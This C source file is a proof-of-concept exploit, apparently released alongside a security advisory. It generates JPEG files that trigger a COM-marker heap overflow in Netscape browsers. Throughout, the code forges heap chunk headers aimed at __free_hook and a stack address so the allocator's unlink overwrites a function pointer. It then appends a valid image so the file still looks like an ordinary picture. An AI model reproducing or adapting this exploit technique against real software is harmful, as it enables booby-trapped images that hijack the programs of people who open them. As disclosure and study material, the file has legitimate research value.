/*
 * JFIF file compiler to produce images that exploit the COM marker
 * processing vulnerability in Netscape browsers.
 *
 * See the advisory (OW-002-netscape-jpeg) for an explanation of how
 * this works.
 */

#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

#define PATTERN_COUNT			0x100
#define VALID_JPEG			"valid.jpg"

#define FUNCTION_POINTER		0x402a54b4	/* __free_hook */
#define CODE_ADDRESS			0xbffff000	/* on the stack */

#define PATTERN_PREV_SIZE		0		/* shouldn't matter */
#define PATTERN_SIZE			0		/* bit 0: PREV_INUSE */
#define PATTERN_FWD			(FUNCTION_POINTER - 12)
#define PATTERN_BCK			(CODE_ADDRESS - 8)

#define COMMENT_SIZE			(PATTERN_COUNT * 0x10 + 2 + 4)

#define M_SOI				0xd8	/* start of image */
#define M_COM				0xfe	/* comment */

int main()
{
	char *image, *p;
	int size, fill, i;
	struct stat st;
	int fd;

	if (stat(VALID_JPEG, &st)) return 1;

	size = 2 + 2 + COMMENT_SIZE + 2 + COMMENT_SIZE + st.st_size - 2;
	image = (char *)malloc(size);
	if (!image) return 1;

	p = image;

/* Start of image */
	*p++ = 0xff;
	*p++ = M_SOI;

/* JFIF requires that an APP0 marker be present right after the SOI marker,
 * but we violate JPEG interchange format and JFIF specification in other
 * ways, anyway. */

/* First COM marker segment, to make sure a large enough backtrack buffer
 * is already allocated by the time we get to the actual attack and avoid
 * undesired calls to realloc(3) in Netscape 4.x+. */
	*p++ = 0xff;
	*p++ = M_COM;
	*p++ = COMMENT_SIZE >> 8;
	*p++ = COMMENT_SIZE & 0xff;

	for (i = 0; i < COMMENT_SIZE - 2; i++)
		*p++ = 'x';

/* The attack starts here */
	*p++ = 0xff;
	*p++ = M_COM;
	*p++ = 0x00; /* high */
	*p++ = 0x01; /* low */

/* Netscape browsers start the endless loop here, while the IJG library
 * simply expects a new marker. We put our attack code into yet another
 * COM marker segment specifically for the IJG library to skip this and
 * display the valid image we put at the end. */
	*p++ = 0xff;
	*p++ = M_COM;
	fill = 0;
	*p++ = (COMMENT_SIZE - 4) >> 8;
	if (*(p - 1) > 0 && *(p - 1) < ' ') fill++;
	*p++ = (COMMENT_SIZE - 4) & 0xff;
	if (*(p - 1) > 0 && *(p - 1) < ' ') fill++;

/* Compensate for non-printable characters to ensure correct alignment */
	for (i = 0; i < fill; i++)
		*p++ = ' ';

	for (i = 0; i <= PATTERN_COUNT; i++) {
/* The marker and length above took 4 bytes, so we skip 4 bytes in the
 * first instance of the pattern for alignment. */
		if (i) {
			*p++ = PATTERN_PREV_SIZE & 0xff;
			*p++ = (PATTERN_PREV_SIZE >> 8) & 0xff;
			if (i == PATTERN_COUNT && fill == 2) break;
			*p++ = (PATTERN_PREV_SIZE >> 16) & 0xff;
			if (i == PATTERN_COUNT && fill == 1) break;
			*p++ = (PATTERN_PREV_SIZE >> 24) & 0xff;
			if (i == PATTERN_COUNT) break;
		}

		*p++ = PATTERN_SIZE & 0xff;
		*p++ = (PATTERN_SIZE >> 8) & 0xff;
		*p++ = (PATTERN_SIZE >> 16) & 0xff;
		*p++ = (PATTERN_SIZE >> 24) & 0xff;

		*p++ = PATTERN_FWD & 0xff;
		*p++ = (PATTERN_FWD >> 8) & 0xff;
		*p++ = (PATTERN_FWD >> 16) & 0xff;
		*p++ = (PATTERN_FWD >> 24) & 0xff;

		*p++ = PATTERN_BCK & 0xff;
		*p++ = (PATTERN_BCK >> 8) & 0xff;
		*p++ = (PATTERN_BCK >> 16) & 0xff;
		*p++ = (PATTERN_BCK >> 24) & 0xff;
	}

/* Append the valid image, skipping its SOI marker */
	if ((fd = open(VALID_JPEG, O_RDONLY)) < 0) return 1;
	if (lseek(fd, 2, SEEK_SET) != 2) return 1;
	if (read(fd, p, st.st_size - 2) != st.st_size - 2) return 1;

/* And finally, output the entire thing */
	if (write(1, image, size) != size) return 1;

	return 0;
}
